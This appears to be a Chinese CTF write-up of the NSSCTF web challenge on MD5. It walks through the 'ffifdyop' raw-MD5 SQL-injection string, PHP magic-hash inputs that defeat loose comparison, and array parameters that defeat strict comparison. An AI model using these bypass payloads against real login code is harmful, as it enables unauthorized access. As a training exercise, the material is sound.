NSSCTF每日一题_Web_[SWPUCTF 2022 新生赛]奇妙的MD5

为了保持做题的感觉和持续学习,也就有了每日一题系列,选一些有意义的题目或者一些CTF新颖题目作为参考学习。

[SWPUCTF 2022 新生赛]奇妙的MD5

1. 访问首页界面并进行分析

估计题目MD5提示,查询得知

ffifdyop 这个字符串是一个奇妙的MD5字符串

因为将"ffifdyop"MD5每两位十六进制对应一个 ASCII 字符之后有'or'6 ,本身看似无意义,但一旦放入早期未做安全防护的 SQL 登录验证语句 中,就会瞬间改变逻辑,代入SQL后语句会被解析为查询逻辑为 **"真,**导致整个查询条件恒成立,实现 SQL注入攻击

2.查询字符串ffifdyop

3.查看源码,绕过弱比较

复制代码
<!--
$x= $GET['x'];
$y = $_GET['y'];
if($x != $y && md5($x) == md5($y)){
    ;
-->

#字符不相同,但是md5值相同

0e 绕过 即可

复制代码
?x=QNKCDZO&y=240610708

(这类字符有很多)

复制代码
QNKCDZO
240610708
314282422
571579406
903251147
s878926199a
s155964671a
s214587387a
s214587387a

4.下一步,数组绕过强比较

复制代码
<?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['wqh']!==$_POST['dsy']&&md5($_POST['wqh'])===md5($_POST['dsy'])){
    echo $FLAG;
} 

wqh[]=1&dsy[]=2
相关推荐
WayneJoon.H2 天前
CTFSHOW 中期测评(二)web502 - web516
安全·网络安全·php·web·ctf
诗人不说梦^15 天前
[RootersCTF2019]I_<3_Flask
web·ctf
爱隐身的官人16 天前
cfshow-web入门-php特性
python·php·ctf
爱隐身的官人16 天前
ctfshow - web - nodejs
前端·nodejs·ctf
诗人不说梦^18 天前
[CISCN2019 总决赛 Day2 Web1]Easyweb
web·ctf
Bruce_Liuxiaowei22 天前
基于BeEF的XSS钓鱼攻击与浏览器劫持实验
前端·网络安全·ctf·xss
爱隐身的官人23 天前
Web知识的总结
web安全·ctf
诗人不说梦^24 天前
[SWPUCTF 2018]SimplePHP
web·ctf
Chen--Xing24 天前
宁波市第八届网络安全大赛 -- Crypto -- WriteUp
ctf·crypto·宁波市第八届网络安全大赛